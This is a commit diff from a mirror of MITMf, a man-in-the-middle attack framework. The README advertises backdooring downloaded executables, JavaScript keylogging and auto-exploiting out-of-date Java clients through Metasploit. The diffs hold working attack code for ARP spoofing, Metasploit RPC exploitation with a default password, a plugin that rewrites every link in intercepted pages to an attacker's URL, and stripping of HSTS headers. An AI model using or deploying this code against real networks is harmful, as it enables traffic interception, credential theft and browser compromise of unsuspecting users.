github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-07-29 19:28:29 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

Merge remote-tracking branch 'upstream/master'

Browse source
This commit is contained in:
root 2014-07-18 20:51:38 +10:00
commit e288c658bc
5 changed files with 68 additions and 12 deletions
Download patch file Download diff file Expand all files Collapse all files

6
README.md
View file

@ -29,11 +29,13 @@ So far the most significant changes have been:
- Addition of the JsKeylogger plugin - Addition of the JsKeylogger plugin
- FilePwn plugin re-written to backdoor executables and zip files on the fly by using the-backdoor-factory - FilePwn plugin re-written to backdoor executables and zip files on the fly by using the-backdoor-factory
https://github.com/secretsquirrel/the-backdoor-factory https://github.com/secretsquirrel/the-backdoor-factory and code from BDFProxy https://github.com/secretsquirrel/BDFProxy
- Added msfrpc.py for interfacing with Metasploits rpc server - Added msfrpc.py for interfacing with Metasploits rpc server
- Added Link Re-Writer plugin
- Addition of the app-cache poisoning attack by Krzysztof Kotowicz - Addition of the app-cache poisoning attack by Krzysztof Kotowicz
- JavaPwn plugin now live! Auto-detect and exploit clients with out-of-date java plugins using the Metasploit Frameworks rpc interface!! - JavaPwn plugin now live! Auto-detect and exploit clients with out-of-date java plugins using the Metasploit Frameworks rpc interface!!

9
plugins/ArpSpoof.py
View file

@ -18,6 +18,7 @@ class ArpSpoof(Plugin):
self.options = options self.options = options
self.interface = options.interface self.interface = options.interface
self.routerip = options.routerip self.routerip = options.routerip
self.routermac = getmacbyip(self.routerip)
self.summary = options.summary self.summary = options.summary
self.target = options.target self.target = options.target
self.mode = options.mode self.mode = options.mode
@ -30,7 +31,7 @@ class ArpSpoof(Plugin):
if os.geteuid() != 0: if os.geteuid() != 0:
sys.exit("[-] %s plugin requires root privileges" % self.name) sys.exit("[-] %s plugin requires root privileges" % self.name)
if self.interface == None or self.routerip == None: if (not self.interface or not self.routerip):
sys.exit("[-] %s plugin requires --routerip and --interface" % self.name) sys.exit("[-] %s plugin requires --routerip and --interface" % self.name)
if self.options.log_level == 'debug': if self.options.log_level == 'debug':
@ -107,7 +108,5 @@ class ArpSpoof(Plugin):
file.close() file.close()
os.system('iptables -t nat -F && iptables -t nat -X') os.system('iptables -t nat -F && iptables -t nat -X')
print '[*] Re-arping network' print '[*] Re-arping network'
rearp_mac = getmacbyip(self.routerip) pkt = Ether(src=self.routermac, dst='ff:ff:ff:ff:ff:ff')/ARP(psrc=self.routerip, hwsrc=self.routermac, op=2)
pkt = Ether(src=rearp_mac, dst='ff:ff:ff:ff:ff:ff')/ARP(psrc=self.routerip, hwsrc=self.mac, op=2) sendp(pkt, inter=1, count=5, iface=self.interface)
sendp(pkt, inter=1, count=5, iface=self.interface)
sys.exit(0)

14
plugins/JavaPwn.py
View file

@ -22,6 +22,8 @@ class JavaPwn(BrowserProfiler, Plugin):
self.options = options self.options = options
self.msfip = options.msfip self.msfip = options.msfip
self.msfport = options.msfport self.msfport = options.msfport
self.rpcip = options.rpcip
self.rpcpass = options.rpcpass
if not self.msfip: if not self.msfip:
sys.exit('[-] JavaPwn plugin requires --msfip') sys.exit('[-] JavaPwn plugin requires --msfip')
@ -36,12 +38,12 @@ class JavaPwn(BrowserProfiler, Plugin):
self.sploited_ips = [] # store ip of pwned or not vulnarable clients so we don't re-exploit self.sploited_ips = [] # store ip of pwned or not vulnarable clients so we don't re-exploit
try: try:
msf = msfrpc.Msfrpc({}) #create an instance of msfrpc libarary msf = msfrpc.Msfrpc({"host" : self.rpcip}) #create an instance of msfrpc libarary
msf.login('msf', 'abc123') msf.login('msf', self.rpcpass)
version = msf.call('core.version')['version'] version = msf.call('core.version')['version']
print "[*] Succesfully connected to Metasploit v%s" % version print "[*] Succesfully connected to Metasploit v%s" % version
except: except:
sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and ran 'load msgrpc Pass=abc123'") sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")
#Initialize the BrowserProfiler plugin #Initialize the BrowserProfiler plugin
BrowserProfiler.initialize(self, options) BrowserProfiler.initialize(self, options)
@ -165,11 +167,13 @@ class JavaPwn(BrowserProfiler, Plugin):
def add_options(self, options): def add_options(self, options):
options.add_argument('--msfip', dest='msfip', help='IP Address of MSF') options.add_argument('--msfip', dest='msfip', help='IP Address of MSF')
options.add_argument('--msfport', dest='msfport', default='8080', help='Port of MSF web-server [default: 8080]') options.add_argument('--msfport', dest='msfport', default='8080', help='Port of MSF web-server [default: 8080]')
options.add_argument('--rpcip', dest='rpcip', default='127.0.0.1', help='IP of MSF MSGRPC server [default: localhost]')
options.add_argument('--rpcpass', dest='rpcpass', default='abc123', help='Password for the MSF MSGRPC server [default: abc123]')
def finish(self): def finish(self):
'''This will be called when shutting down''' '''This will be called when shutting down'''
msf = msfrpc.Msfrpc({}) msf = msfrpc.Msfrpc({"host": self.rpcip})
msf.login('msf', 'abc123') msf.login('msf', self.rpcpass)
jobs = msf.call('job.list') jobs = msf.call('job.list')
if len(jobs) > 0: if len(jobs) > 0:
print '[*] Stopping all running metasploit jobs' print '[*] Stopping all running metasploit jobs'

48
plugins/Linkrewriter.py Normal file
View file

@ -0,0 +1,48 @@
#probably a better way of doing this
import logging, re, sys, os
from plugins.plugin import Plugin
class LinkRw(Plugin):
name = "Link Re-Writer"
optname = "linkrw"
implements = ["handleResponse"]
has_opts = True
desc = "Rewrites all href attributes to a specified url"
def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.url = options.url
self.mime = "text/html"
print "[*] Link Re-Writer plugin online"
def handleResponse(self, request, data):
ip,hn,mime = self._get_req_info(request)
if mime.find(self.mime)!=-1:
data = self.repl_hrefs(data)
logging.info("%s [%s] Re-wrote hrefs" % (request.client.getClientIP(), request.headers['host']))
return {'request':request,'data':data}
else:
return
def add_options(self, options):
options.add_argument("--url", type=str, help="URL to re-write")
def _get_req_info(self, request):
ip = request.client.getClientIP()
hn = request.client.getRequestHostname()
mime = request.client.headers['Content-Type']
return (ip,hn,mime)
def repl_hrefs(self, data):
regex = [re.compile(r"href=[\'\"]http[s]?://.+[\'\"]", re.I)]
for i,r in enumerate(regex):
data=re.sub(r, "href=" + self.url, data)
return data

3
sslstrip/ClientRequest.py
View file

@ -56,6 +56,9 @@ class ClientRequest(Request):
if 'accept-encoding' in headers: if 'accept-encoding' in headers:
headers['accept-encoding'] == 'identity' headers['accept-encoding'] == 'identity'
if 'Strict-Transport-Security' in headers: #kill new hsts requests
del headers['Strict-Transport-Security']
if 'if-modified-since' in headers: if 'if-modified-since' in headers:
del headers['if-modified-since'] del headers['if-modified-since']